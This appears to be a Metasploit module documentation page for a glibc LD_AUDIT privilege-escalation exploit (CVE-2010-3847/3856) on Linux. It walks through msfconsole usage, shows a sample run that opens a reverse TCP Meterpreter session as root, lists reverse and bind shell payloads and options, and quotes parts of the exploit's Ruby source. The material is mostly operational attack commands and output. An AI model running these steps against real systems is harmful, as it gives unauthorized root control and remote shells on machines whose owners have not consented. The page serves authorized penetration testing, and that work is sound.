glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/linux/local/glibc_ld_audit_dso_load_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation
Module: exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
Source code: modules/exploits/linux/local/glibc_ld_audit_dso_load_priv_esc.rb
Disclosure date: 2010-10-18
Last modification time: 2022-10-05 19:43:07 +0000
Supported architecture(s): x86, x64
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2010-3847, CVE-2010-3856

This module attempts to gain root privileges on Linux systems by abusing a vulnerability in the GNU C Library (glibc) dynamic linker. glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not properly restrict use of the LD_AUDIT environment variable when loading setuid executables. This allows loading arbitrary shared objects from the trusted library search path with the privileges of the suid user. This module uses LD_AUDIT to load the libpcprofile.so shared object, distributed with some versions of glibc, and leverages arbitrary file creation functionality in the library constructor to write a root-owned world-writable file to a system trusted search path (usually /lib). The file is then overwritten with a shared object then loaded with LD_AUDIT resulting in arbitrary code execution. This module has been tested successfully on glibc version 2.11.1 on Ubuntu 10.04 x86_64 and version 2.7 on Debian 5.0.4 i386. RHEL 5 is reportedly affected, but untested. Some glibc distributions do not contain the libpcprofile.so library required for successful exploitation.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
msf exploit(glibc_ld_audit_dso_load_priv_esc) > show targets
    ... a list of targets ...
msf exploit(glibc_ld_audit_dso_load_priv_esc) > set TARGET target-id
msf exploit(glibc_ld_audit_dso_load_priv_esc) > show options
    ... show and set options ...
msf exploit(glibc_ld_audit_dso_load_priv_esc) > set SESSION session-id
msf exploit(glibc_ld_audit_dso_load_priv_esc) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Description


This module attempts to gain root privileges on Linux systems by abusing a vulnerability in the GNU C Library (glibc) dynamic linker to load arbitrary shared objects.

Vulnerable Application


glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not properly restrict use of the LD_AUDIT environment variable when loading setuid executables. This allows loading arbitrary shared objects from the trusted library search path with the privileges of the suid user.

This module uses LD_AUDIT to load the libpcprofile.so shared object, distributed with some versions of glibc, and leverages arbitrary file creation functionality in the library constructor to write a root-owned world-writable file to a system trusted search path (usually /lib). The file is then overwritten with a shared object then loaded with LD_AUDIT resulting in arbitrary code execution.

This module has been tested successfully on:

  • glibc version 2.11.1 on Ubuntu 10.04 (x86_64)
  • glibc version 2.7 on Debian 5.0.4 (i386)

RHEL 5 is reportedly affected, but untested.

Some glibc distributions do not contain the libpcprofile.so library required for successful exploitation.

Verification Steps


  1. Start msfconsole
  2. Get a session
  3. Do: use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
  4. Do: set SESSION [SESSION]
  5. Do: check
  6. Do: run
  7. You should get a new root session

Options


SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: /tmp)

Scenarios


  msf > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc 
  msf exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set session 1
session => 1
  msf exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.244:4444 
  [+] The target appears to be vulnerable
  [*] Using target: Linux x64
  [*] Writing '/tmp/.GQh1C8euY' (1913 bytes) ...
  [*] Writing '/tmp/.3l76zsoHT' (246 bytes) ...
  [*] Writing '/tmp/.WSuOVyo' (207 bytes) ...
  [*] Launching exploit...
  [*] Sending stage (857352 bytes) to 172.16.191.149
  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.149:45721) at 2018-01-27 23:59:36 -0500

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.149
  OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  meterpreter > 

Go back to menu.

Msfconsole Usage


Here is how the linux/local/glibc_ld_audit_dso_load_priv_esc exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc

[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > show info

       Name: glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation
     Module: exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
   Platform: Linux
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2010-10-18

Provided by:
  Tavis Ormandy
  zx2c4
  Marco Ivaldi
  Todor Donev
  bcoles <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Linux x86
  2   Linux x64

Check supported:
  Yes

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  SESSION                           yes       The session to run this module on.
  SUID_EXECUTABLE  /bin/ping        yes       Path to a SUID executable

Payload information:

Description:
  This module attempts to gain root privileges on Linux systems by 
  abusing a vulnerability in the GNU C Library (glibc) dynamic linker. 
  glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does 
  not properly restrict use of the LD_AUDIT environment variable when 
  loading setuid executables. This allows loading arbitrary shared 
  objects from the trusted library search path with the privileges of 
  the suid user. This module uses LD_AUDIT to load the libpcprofile.so 
  shared object, distributed with some versions of glibc, and 
  leverages arbitrary file creation functionality in the library 
  constructor to write a root-owned world-writable file to a system 
  trusted search path (usually /lib). The file is then overwritten 
  with a shared object then loaded with LD_AUDIT resulting in 
  arbitrary code execution. This module has been tested successfully 
  on glibc version 2.11.1 on Ubuntu 10.04 x86_64 and version 2.7 on 
  Debian 5.0.4 i386. RHEL 5 is reportedly affected, but untested. Some 
  glibc distributions do not contain the libpcprofile.so library 
  required for successful exploitation.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2010-3847
  https://nvd.nist.gov/vuln/detail/CVE-2010-3856
  http://www.securityfocus.com/bid/44154
  http://www.securityfocus.com/bid/44347
  https://www.exploit-db.com/exploits/15274
  https://www.exploit-db.com/exploits/15304
  https://www.exploit-db.com/exploits/18105
  https://seclists.org/fulldisclosure/2010/Oct/257
  https://seclists.org/fulldisclosure/2010/Oct/344
  https://www.ubuntu.com/usn/usn-1009-1
  https://security-tracker.debian.org/tracker/CVE-2010-3847
  https://security-tracker.debian.org/tracker/CVE-2010-3856
  https://access.redhat.com/security/cve/CVE-2010-3847
  https://access.redhat.com/security/cve/CVE-2010-3856

Module Options


This is a complete list of options available in the linux/local/glibc_ld_audit_dso_load_priv_esc exploit:

msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > show options

Module options (exploit/linux/local/glibc_ld_audit_dso_load_priv_esc):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on.
   SUID_EXECUTABLE  /bin/ping        yes       Path to a SUID executable

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the linux/local/glibc_ld_audit_dso_load_priv_esc exploit:

msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > show advanced

Module advanced options (exploit/linux/local/glibc_ld_audit_dso_load_priv_esc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session
   WritableDir             /tmp             yes       A directory where we can write files

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/local/glibc_ld_audit_dso_load_priv_esc module can exploit:

msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Linux x86
   2   Linux x64

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/glibc_ld_audit_dso_load_priv_esc exploit:

msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   12  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   13  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   14  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   15  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   16  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   17  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   18  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   19  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   20  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   21  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   22  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   23  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   24  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   25  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   26  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   27  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   28  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   30  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   31  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   32  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   33  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   34  payload/linux/x86/read_file                                        normal  No     Linux Read File
   35  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   36  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   37  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   38  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   39  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   40  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   41  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   42  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   43  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   45  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   46  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   47  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   48  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/local/glibc_ld_audit_dso_load_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Could not determine the GNU C library version


Here is a relevant code snippet related to the "Could not determine the GNU C library version" error message:

93:	
94:	  def check
95:	    glibc_banner = cmd_exec 'ldd --version'
96:	    glibc_version = Rex::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
97:	    if glibc_version.to_s.eql? ''
98:	      vprint_error 'Could not determine the GNU C library version'
99:	      return CheckCode::Safe
100:	    elsif glibc_version >= Rex::Version.new('2.12.2') ||
101:	          (glibc_version >= Rex::Version.new('2.11.3') && glibc_version < Rex::Version.new('2.12'))
102:	      vprint_error "GNU C Library version #{glibc_version} is not vulnerable"
103:	      return CheckCode::Safe

GNU C Library version <GLIBC_VERSION> is not vulnerable


Here is a relevant code snippet related to the "GNU C Library version <GLIBC_VERSION> is not vulnerable" error message:

97:	    if glibc_version.to_s.eql? ''
98:	      vprint_error 'Could not determine the GNU C library version'
99:	      return CheckCode::Safe
100:	    elsif glibc_version >= Rex::Version.new('2.12.2') ||
101:	          (glibc_version >= Rex::Version.new('2.11.3') && glibc_version < Rex::Version.new('2.12'))
102:	      vprint_error "GNU C Library version #{glibc_version} is not vulnerable"
103:	      return CheckCode::Safe
104:	    end
105:	    vprint_good "GNU C Library version #{glibc_version} is vulnerable"
106:	
107:	    lib = 'libpcprofile.so'

Could not find <LIB>


Here is a relevant code snippet related to the "Could not find <LIB>" error message:

117:	        @lib_dir = lib_dir
118:	        break
119:	      end
120:	    end
121:	    if @lib_dir.nil?
122:	      vprint_error "Could not find #{lib}"
123:	      return CheckCode::Safe
124:	    end
125:	    vprint_good "Found #{lib} in #{@lib_dir}"
126:	
127:	    unless setuid? suid_exe_path

<SUID_EXE_PATH> is not setuid


Here is a relevant code snippet related to the "<SUID_EXE_PATH> is not setuid" error message:

123:	      return CheckCode::Safe
124:	    end
125:	    vprint_good "Found #{lib} in #{@lib_dir}"
126:	
127:	    unless setuid? suid_exe_path
128:	      vprint_error "#{suid_exe_path} is not setuid"
129:	      return CheckCode::Detected
130:	    end
131:	    vprint_good "#{suid_exe_path} is setuid"
132:	
133:	    CheckCode::Appears

<SUID_EXE_PATH> is not suid


Here is a relevant code snippet related to the "<SUID_EXE_PATH> is not suid" error message:

155:	    check_status = check
156:	
157:	    if check_status == CheckCode::Appears
158:	      print_good 'The target appears to be vulnerable'
159:	    elsif check_status == CheckCode::Detected
160:	      fail_with Failure::BadConfig, "#{suid_exe_path} is not suid"
161:	    else
162:	      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
163:	    end
164:	
165:	    payload_name = ".#{rand_text_alphanumeric rand(5..10)}"

Target is not vulnerable


Here is a relevant code snippet related to the "Target is not vulnerable" error message:

157:	    if check_status == CheckCode::Appears
158:	      print_good 'The target appears to be vulnerable'
159:	    elsif check_status == CheckCode::Detected
160:	      fail_with Failure::BadConfig, "#{suid_exe_path} is not suid"
161:	    else
162:	      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
163:	    end
164:	
165:	    payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
166:	    payload_path = "#{base_dir}/#{payload_name}"
167:	

Unable to automatically select a target


Here is a relevant code snippet related to the "Unable to automatically select a target" error message:

173:	      when 'x86_64'
174:	        my_target = targets[2]
175:	      when /x86/, /i\d86/
176:	        my_target = targets[1]
177:	      else
178:	        fail_with Failure::NoTarget, 'Unable to automatically select a target'
179:	      end
180:	    else
181:	      my_target = target
182:	    end
183:	    print_status "Using target: #{my_target.name}"

Target is not compatible


Here is a relevant code snippet related to the "Target is not compatible" error message:

187:	    when ARCH_X86
188:	      cpu = Metasm::Ia32.new
189:	    when ARCH_X64
190:	      cpu = Metasm::X86_64.new
191:	    else
192:	      fail_with Failure::NoTarget, 'Target is not compatible'
193:	    end
194:	
195:	    # Compile shared object
196:	    so_stub = %|
197:	      extern int setuid(int);

Metasm encoding failed: <VALUE>


Here is a relevant code snippet related to the "Metasm encoding failed: <VALUE>" error message:

208:	    |
209:	
210:	    begin
211:	      so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
212:	    rescue
213:	      print_error "Metasm encoding failed: #{$ERROR_INFO}"
214:	      elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
215:	      elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"
216:	      fail_with Failure::Unknown, 'Metasm encoding failed'
217:	    end
218:	

Metasm encoding failed: <VALUE> : <VALUE>


Here is a relevant code snippet related to the "Metasm encoding failed: <VALUE> : <VALUE>" error message:

209:	
210:	    begin
211:	      so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
212:	    rescue
213:	      print_error "Metasm encoding failed: #{$ERROR_INFO}"
214:	      elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
215:	      elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"
216:	      fail_with Failure::Unknown, 'Metasm encoding failed'
217:	    end
218:	
219:	    # Upload shared object

Call stack:n<VALUE>


Here is a relevant code snippet related to the "Call stack:n<VALUE>" error message:

210:	    begin
211:	      so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
212:	    rescue
213:	      print_error "Metasm encoding failed: #{$ERROR_INFO}"
214:	      elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
215:	      elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"
216:	      fail_with Failure::Unknown, 'Metasm encoding failed'
217:	    end
218:	
219:	    # Upload shared object
220:	    so_name = ".#{rand_text_alphanumeric rand(5..10)}"

Metasm encoding failed


Here is a relevant code snippet related to the "Metasm encoding failed" error message:

211:	      so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
212:	    rescue
213:	      print_error "Metasm encoding failed: #{$ERROR_INFO}"
214:	      elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
215:	      elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"
216:	      fail_with Failure::Unknown, 'Metasm encoding failed'
217:	    end
218:	
219:	    # Upload shared object
220:	    so_name = ".#{rand_text_alphanumeric rand(5..10)}"
221:	    so_path = "#{base_dir}/#{so_name}"

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Tavis Ormandy
  • zx2c4
  • Marco Ivaldi
  • Todor Donev
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.